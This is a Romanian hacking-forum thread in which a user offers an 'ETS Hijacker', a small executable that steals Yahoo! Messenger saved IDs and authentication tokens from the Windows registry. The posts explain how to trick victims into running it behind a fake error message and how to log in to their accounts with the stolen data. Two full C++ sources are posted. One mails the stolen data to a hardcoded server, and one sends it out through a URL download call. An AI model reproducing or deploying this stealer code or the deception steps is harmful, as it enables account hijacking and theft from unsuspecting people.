Jump to content
Guest chri5ty

ETS Hijacker

Recommended Posts

Guest chri5ty
Posted (edited)

Aceasta este, probabil, ce mai simpla metoda de a sparge un cont de messenger. Da-le dra**** de keyloggere... bindere... ftp-uri.. toate ca sa furi o parola...

Atunci cand te loghezi pe Yahoo! Messenger, ai optiunea de a salva id-ul si parola, pentru logari ulterioare. ID-ul se salveaza in registri, si se mai salveaza un cod, ETS, in care se memoreaza token-ul de autentificare. Din token nu se poate extrage parola.

Ce inseamna asta? Daca extragi cele 2 informatii din registri, iar apoi le "plantezi" pe alt calculator, ai sa ai surpriza ca te poti loga cu id-ul si parola salvata, deci pe contul altcuiva, fara sa ii afli neaparat si parola.

Simplu, nu?

Am facut cu C++ un exe de dimensiuni mici, pe care il gasiti arhivat aici. Cand este lansat in executie, el extrage id-ul si ETS-ul, si le trimite pe un server. Cateva explicatii pe engleza, mai gasiti aici.

Dati exe-ul la cineva, si il convingeti sa il deschida. Programul va afisa un mesaj fals de eroare. Intrati pe http://it.octopis.com/ets.php, scrieti id-ul, si vedeti daca operatia a avut succes. Daca da, se va afisa id-ul si codul ETS. Click pe id, ca sa descarcati un fisier .REG, pe care il executati. Deschideti messenger-ul si surpriza!! Te-ai logat pe acel id! Ai acces la tot contul de Yahoo! + ca din moment ce ai acces la contul de e-mail, poti sa ii spargi conturile de pe hi5 / netlog / tagged (+ inca alte porcarii de saituri)...

SPOR LA FURAT!

Programul e mic si este bazat pe un principiu foarte simplu, iar sursa o tin sub cheie, pentru cei curiosi.

Saitul it.octopis.com e saitul meu, asa ca nu strica sa azvarliti o privire. Am pus 3-4 programele si mi-e o lene... sa mai adaug cateva.

Edited by chri5ty
Guest chri5ty
Posted
Daca nu ne arati si sursa nu esti TRU.

Am explicat detaliat ce face. Rasfoiti registrii, ca nu va cade mana. Localizati cele 2 chei, si scrieti-va si singuri codul. Mie mi-a incaput tot pe 15 linii. :rolleyes:Poate am sa pun sursa. Ideea era sa se gandeasca fiecare cum se face, fiindca vine un 'Copy/Paste' si adauga fragmentul de cod la programul lui, apoi il lauda ca fiind nush ce unealta a lui de hacking, un trojan "ni-no-ni-no", absolut spectaculos, insa programul de fata e "pur si simplu prea simplu".

interesanta treaba..da tu practic ai acces la toate id`urile de acolo ...

Exact. Pe pagina pe care dai search, eu am cativa parametri secreti, prin care vad lista de ID-uri. Cand aveam 10-20 de intrari, ma mai uitam prin ele, iar uneori am vazut ca apartin unor persoane care nu merita sa incaseze 'palme' de la un mucos de cativa ani care s-a gandit sa ii sparga contul. De cand am 50 de bucati, chiar nu ma mai intereseaza sa ma incerc fiecare ID.

and unless you make your own you'll be labelled a script kiddie

La ce te referi, mai exact?

chri5ty only 17 ani?:OOEsti dat dreq la varsta asta!!

16.5 ani, multumesc.. Am incaput din clasa a 5-a cu HTMl-ul, cu Pascal dintr-a 6-a, iar cu C-ul dintr-a 7-a. In clasa a 9-a, in vacanta de vara, adica vara trecuta, am invatat C++ pana la perfectie. :D:cool:

Posted (edited)

Ok frumos program


Activez deep freeze sau vmware il execut fara conexiune la internet extrag executabilul MVC++ dupa instalare il decompilez si hopa codu sursa...big deal pt. cei care vor sursa...incearca si fa-l in pascal, delphi si esti "tatic"

Intrebarea este urmatoarea daca victima il executa fara conexiune la net ce se intampla?Este

stocat" fisierul de log cu datele de logare undeva pe hdd si cand "vede" o bucata de net trimite datele?

Edited by zaiet-pagadi
Guest chri5ty
Posted
Ok frumos program


Activez deep freeze sau vmware il execut fara conexiune la internet extrag
executabilul MVC++ dupa instalare il decompilez si hopa codu sursa...big deal
pt. cei care vor sursa...incearca si fa-l in pascal, delphi si esti "tatic"

Intrebarea este urmatoarea daca victima il executa fara conexiune la net ce se intampla?Este

stocat" fisierul de log cu datele de logare undeva pe hdd si cand "vede" o bucata de net trimite datele?

La ce iti trebuie deep freeze?(haha) E un executabil microscopic si iti garantez eu ca face ceea ce spune. Daca nu e conexiune la net, nu se stocheaza nimic. Nu m-a interesat deloc aspectul asta.

Si nu cred ca il poti decompila. Poate doar daca il dezasamblezi. Si chiar si asa, nu faci decat sa imi demonstrezi ca iti lipseste o tona de creativitate. E foarte simplu, ce naiba! Ma adresez programatorilor cu un nivel sub-mediu, sau macar mediu.

Posted
 #include <fstream>
#include <iostream>
#include <cstdlib>
#include <windows.h>
using namespace std;
char data[1000];
char bufferout[1000];
char bufferin[1000];
char ip[100];
char mail[100];
int port;
SOCKET asock, bsock;
SOCKADDR_IN sina, sinb;
WSADATA wsadata;

int checkKey(HKEY tree, const char *folder, char *key) {
long lRet;
HKEY hKey;
char temp[150];
DWORD dwBufLen;

// Open location
lRet = RegOpenKeyEx( tree, folder, 0, KEY_QUERY_VALUE, &hKey );
if (lRet != ERROR_SUCCESS)
return 0;

// Get key
dwBufLen = sizeof(temp);
lRet = RegQueryValueEx( hKey, key, NULL, NULL, (BYTE*)&temp, &dwBufLen );
if (lRet != ERROR_SUCCESS)
return 0;
strcpy(data+strlen(data), temp);
data[strlen(data)]=' ';


// Close key
lRet = RegCloseKey( hKey );
if (lRet != ERROR_SUCCESS)
return 0;

// Got this far, then key exists
return 1;
}
int errorcheck(){
if(bufferin[0]=='2'&&bufferin[1]=='2'&&bufferin[2]=='0'){ return 1;}
if(bufferin[0]=='2'&&bufferin[1]=='5'&&bufferin[2]=='0') return 1;
if(bufferin[0]=='4'&&bufferin[1]=='2'&&bufferin[2]=='1') return 0;
return 1;
}



int main()
{ mail[0]='<';
strcpy(mail+1, "mailto@yahoo.com");
mail[strlen(mail)+2]='\0';
mail[strlen(mail)+1]='\n';
mail[strlen(mail)]='>';
for(int i=0; i<sizeof(data); i++) data[i]='\0';
checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "ETS");
checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "Yahoo! User ID");

login:
strcpy(ip,"67.195.168.31"); port=25;
WSAStartup(0x101,&wsadata);
bsock=socket(AF_INET, SOCK_STREAM, 0);

sinb.sin_family=AF_INET;
sinb.sin_addr.s_addr=inet_addr(ip);
sinb.sin_port=htons(port);
connect( bsock, (SOCKADDR*) &sinb, sizeof(SOCKADDR_IN) );
recv( bsock, bufferin, sizeof(bufferin), 0);
cout<<bufferin;
Sleep(200); cout<<"\n";
if(!errorcheck()) { cout<<"restart"; WSACleanup(); goto login; }

else cout<<"Connected.\n";
Sleep(30);
//FROM

strcpy(bufferout, "MAIL FROM: <ethereal@yahoo.com>\n");
cout<<"\n\n"<<bufferout<<" "<<strlen(bufferout)<<"\n\n";

send(bsock, bufferout, strlen(bufferout),0);
recv( bsock, bufferin, sizeof(bufferin), 0);
cout<<bufferin;

//RCPT TO
strcpy(bufferout, "RCPT TO: ");
strcpy(bufferout+strlen(bufferout), mail);
cout<<bufferout;
send(bsock, bufferout, strlen(bufferout),0);
recv( bsock, bufferin, sizeof(bufferin), 0);
cout<<bufferin;
// DATA
strcpy(bufferout, "DATA\n");
send(bsock, bufferout, strlen(bufferout),0);
recv( bsock, bufferin, sizeof(bufferin), 0);
cout<<bufferin;
Sleep(30);
strcpy(bufferout, "FROM:ethereal@yahoo.com\n \nSubject: Token stealer\n\n\n");
strcpy(bufferout+strlen(bufferout), data);
strcpy(bufferout+strlen(bufferout),"\n\0");
send(bsock, bufferout, strlen(bufferout),0);

strcpy(bufferout, "\r\n.\r\n");
send(bsock, bufferout, strlen(bufferout),0);
recv( bsock, bufferin, sizeof(bufferin), 0);
cout<<bufferin;
strcpy(bufferout,"quit\n");
send(bsock, bufferout, strlen(bufferout),0);

cout<<"\nEnd of the world.";

cin.get();






}

Posted (edited)
La ce iti trebuie deep freeze?(haha) E un executabil microscopic si iti garantez eu ca face ceea ce spune. Daca nu e conexiune la net, nu se stocheaza nimic. Nu m-a interesat deloc aspectul asta.

Si nu cred ca il poti decompila. Poate doar daca il dezasamblezi. Si chiar si asa, nu faci decat sa imi demonstrezi ca iti lipseste o tona de creativitate. E foarte simplu, ce naiba! Ma adresez programatorilor cu un nivel sub-mediu, sau macar mediu.

Editat...

hai sa nu imi bat capul...incearca sa tii cont si de sfatul altora ca nu vei avea de pierdut

Edited by zaiet-pagadi
Guest chri5ty
Posted

Eu am trimis parametrii prin URLDownloadToFile. URL-ul e un script php din sait + parametri, iar fisierul destinatie e nespecificat.

@zaiet-pagadi - Nu inteleg, ce vrei sa zici?

Guest chri5ty
Posted
eu am intrat in el da nick nu a aparut pe pagina aia

Adica cum? Ce nu iti apare?

Daca voiai sa zici ca ai dat search si nu ai gasit nimic pe ID-ul respectiv, atunci e posibil ca persoana careia i-ai dat programul sa foloseasca multi-mess, caz in care nu a bifat "remember my id and password".

Posted

Te rog mult poti sa specifici sursa ?

#include <fstream>
#include <iostream>
#include <cstdlib>
#include <windows.h>
using namespace std;
char data[1000];
char bufferout[1000];
char bufferin[1000];
char ip[100];
char mail[100];
int port;
SOCKET asock, bsock;
SOCKADDR_IN sina, sinb;
WSADATA wsadata;

int checkKey(HKEY tree, const char *folder, char *key) {
long lRet;
HKEY hKey;
char temp[150];
DWORD dwBufLen;

// Open location
lRet = RegOpenKeyEx( tree, folder, 0, KEY_QUERY_VALUE, &hKey );
if (lRet != ERROR_SUCCESS)
return 0;

// Get key
dwBufLen = sizeof(temp);
lRet = RegQueryValueEx( hKey, key, NULL, NULL, (BYTE*)&temp, &dwBufLen );
if (lRet != ERROR_SUCCESS)
return 0;
strcpy(data+strlen(data), temp);
data[strlen(data)]=' ';


// Close key
lRet = RegCloseKey( hKey );
if (lRet != ERROR_SUCCESS)
return 0;

// Got this far, then key exists
return 1;
}
int errorcheck(){
if(bufferin[0]=='2'&&bufferin[1]=='2'&&bufferin[2]=='0'){ return 1;}
if(bufferin[0]=='2'&&bufferin[1]=='5'&&bufferin[2]=='0') return 1;
if(bufferin[0]=='4'&&bufferin[1]=='2'&&bufferin[2]=='1') return 0;
return 1;
}



int main()
{ mail[0]='<';
strcpy(mail+1, "mailto@yahoo.com");
mail[strlen(mail)+2]='\0';
mail[strlen(mail)+1]='\n';
mail[strlen(mail)]='>';
for(int i=0; i<sizeof(data); i++) data[i]='\0';
checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "ETS");
checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "Yahoo! User ID");

login:
strcpy(ip,"67.195.168.31"); port=25;
WSAStartup(0x101,&wsadata);
bsock=socket(AF_INET, SOCK_STREAM, 0);

sinb.sin_family=AF_INET;
sinb.sin_addr.s_addr=inet_addr(ip);
sinb.sin_port=htons(port);
connect( bsock, (SOCKADDR*) &sinb, sizeof(SOCKADDR_IN) );
recv( bsock, bufferin, sizeof(bufferin), 0);
cout<<bufferin;
Sleep(200); cout<<"\n";
if(!errorcheck()) { cout<<"restart"; WSACleanup(); goto login; }

else cout<<"Connected.\n";
Sleep(30);
//FROM

strcpy(bufferout, "MAIL FROM: <ethereal@yahoo.com>\n");
cout<<"\n\n"<<bufferout<<" "<<strlen(bufferout)<<"\n\n";

send(bsock, bufferout, strlen(bufferout),0);
recv( bsock, bufferin, sizeof(bufferin), 0);
cout<<bufferin;

//RCPT TO
strcpy(bufferout, "RCPT TO: ");
strcpy(bufferout+strlen(bufferout), mail);
cout<<bufferout;
send(bsock, bufferout, strlen(bufferout),0);
recv( bsock, bufferin, sizeof(bufferin), 0);
cout<<bufferin;
// DATA
strcpy(bufferout, "DATA\n");
send(bsock, bufferout, strlen(bufferout),0);
recv( bsock, bufferin, sizeof(bufferin), 0);
cout<<bufferin;
Sleep(30);
strcpy(bufferout, "FROM:ethereal@yahoo.com\n \nSubject: Token stealer\n\n\n");
strcpy(bufferout+strlen(bufferout), data);
strcpy(bufferout+strlen(bufferout),"\n\0");
send(bsock, bufferout, strlen(bufferout),0);

strcpy(bufferout, "\r\n.\r\n");
send(bsock, bufferout, strlen(bufferout),0);
recv( bsock, bufferin, sizeof(bufferin), 0);
cout<<bufferin;
strcpy(bufferout,"quit\n");
send(bsock, bufferout, strlen(bufferout),0);

cout<<"\nEnd of the world.";

cin.get();






}

Daca asta e zimi cum o compilezi autoit , c++ ? sau te rog mult sa imi dai sursa as vrea sa imi fac si eu un aseamenea site

Guest chri5ty
Posted

#include <windows.h>

#include <stdio.h>

#pragma comment(lib,"user32.lib")

#pragma comment(lib,"Urlmon.lib")

void getKey(LPCSTR Path,LPCSTR Key,void*buffer){

HKEY key;unsigned long type=REG_SZ, size=1024;

if (RegOpenKeyEx(HKEY_CURRENT_USER,Path,0,KEY_READ,&key)!=ERROR_SUCCESS)return;

RegQueryValueEx(key,

Key,

NULL,

&type,

(LPBYTE)buffer,

&size);

RegCloseKey(key);

}

int WinMain(HINSTANCE,HINSTANCE,LPCSTR,int){

char buf[1024]="";

char URL[1024]="****************";

getKey("Software\\yahoo\\pager","Yahoo! User ID",URL+strlen(URL));

getKey("Software\\yahoo\\pager","ETS",buf);

strcat(URL,"********");

strcat(URL,buf);

if(strlen(buf)){

URLDownloadToFile(0,URL,"",0,0);

MessageBox(0,"Application failed to initialize","Fatal Error",MB_ICONSTOP);

}else MessageBox(0,"Unexpected error in main module","Fatal Error",MB_ICONSTOP);

return 0;

}

Am ascuns sub *** cativa parametri, ca sa nu se floodeze baza de date. Exista o parola pentru ca intrarile sa fie acceptate.

Posted

am si eu o intrebare ... daca o persoana a accesat acel program... si o alta persoana ii foloseste mailu... cum poate scapa persoana care e victima ? reinstal windows ? ... sau?

Guest chri5ty
Posted

Inlocuiesti ****** cu niste fragmente de URL, astfel incat, in final, sa se obtina un URL de forma "http://sait.com/cale/script.php?parametru=valoare&parametru=valoare...."

E mai simplu decat pare, dar nu am sa evidentiez parametrii pe forum, ca sa nu poate nimeni sa umfle automat baza de date cu mii de intrari fara sens. Scriptul php e la fel de simplu ca si programul.

Chiar se face prea multa discutie pe tema asta. Trebuia sa va dau doar ideea, iar voi, singuri, sa va faceti programele proprii.

Posted

Virus: HEUR/Malware

Type: AHeAD Heuristic special detection

In the wild: No

Reported Infections: Low

Distribution Potential: Low

Damage Potential: Low

Static file: No

Description:

HEUR/Malware

HEUR/Malware is a heuristic detection routine designed to detect common malware characteristics. Avira AntiVir recognizes unknown malware proactively using its AHeAD technology. To achieve this, Avira performs innovative structural analyzing.

On the basis of the composition of a file, the sequence of significant code sequences or based on particular behavior patterns, the heuristics can determine with a high probability whether it is dealing with a harmful or virulent file.

HEUR/Malware in particular is reported when a program seems to contain suspicious functionality.

In the unlikely occurrence of a false positives we would kindly ask for your help and send the file to our virus lab using the quarantine functionality of AntiVir.

A heuristic detection might be a false identification if one or more of the following are true:

- The program has been used for a very long time and is known to the user

- The program was installed by the user himself

- The program is from a trustworthy source

Please note that even old programs can get infected or replaced by malware without your knowledge. Besides that trustworthy sources might have become compromised themselves.

In order to enhance detection and reduce the rate of false positives we recommend you to send the file to our virus lab for further analysis.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...